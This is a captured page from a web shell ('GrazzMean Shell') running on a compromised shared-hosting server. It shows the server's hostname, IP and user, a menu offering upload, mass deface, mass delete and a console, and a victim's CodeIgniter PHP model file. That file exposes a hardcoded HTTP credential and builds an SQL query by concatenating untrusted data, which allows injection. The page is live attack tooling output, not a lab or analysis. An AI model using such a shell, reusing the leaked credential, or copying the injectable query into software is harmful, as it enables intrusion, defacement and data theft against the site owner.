shell bypass 403

GrazzMean Shell

: /home/homesquasz/rh/application/models/ [ drwx---r-x ]
Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl
upload mass deface mass delete console

name : Contrat_model.php 
<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */

class Contrat_model extends CI_Model
{
    function __construct()
    {
        parent::__construct();
    }
    
    /*
     * Get contrat by id
     */
    function get_contrat($id)
    {
        return $this->db->get_where('contrat',array('id'=>$id))->row_array();
    }
    
    /*
     * Get all contrat count
     */
    function get_all_contrat_count()
    {
        $this->db->from('contrat');
        return $this->db->count_all_results();
    }
    
    /*
     * Get all contrat
     */
    function get_all_contrat($params = array())
    {
     $this->db->select('*,contrat.id as idcontrat,typecontrat.libelle as type, users.nom as name');
     $this->db->from('contrat');
     $this->db->join('typecontrat', 'typecontrat.id = contrat.typecontrat_id');
     $this->db->join('users', 'users.id = contrat.users_id');
     $this->db->order_by('contrat.id', 'DESC');
     if(isset($params) && !empty($params))
     {
        $this->db->limit($params['limit'], $params['offset']);
    }
    return $this->db->get()->result_array();
}

    /*
     * function to add new contrat
     */
    function add_contrat($params)
    {
        $this->db->insert('contrat',$params);
        return $this->db->insert_id();
    }
    
    /*
     * function to update contrat
     */
    function update_contrat($id,$params)
    {
        $this->db->where('id',$id);
        return $this->db->update('contrat',$params);
    }
    
    /*
     * function to delete contrat
     */
    function delete_contrat($id)
    {
        return $this->db->delete('contrat',array('id'=>$id));
    }
    function update_solde($url){
        
        
$ch = curl_init($url); // such as http://example.com/example.xml
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
curl_setopt($ch, CURLOPT_USERPWD, 'admintnmzid:GH2019*');
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Accept: */*',
    'If-Match: *'
));
curl_setopt($ch, CURLOPT_TIMEOUT, 100);

curl_setopt($ch, CURLOPT_HEADER, 0);

$data = curl_exec($ch);

curl_close($ch);


$service = json_decode($data);
//print_r($service ->value);

foreach($service ->value as $item)
{
    $row=$this->db->query("select * from users where trim(matricule)='".$item->No."'");
    if($row->num_rows()>0)
    {
        $perso=$row->result();
        $this->db->where("users_id",$perso[0]->id);
        $saved=array("soldeconge"=>$item->Solde_de_conge);
        $this->db->update("contrat",$saved);
    }
    
} 
}
}
© 2026 GrazzMean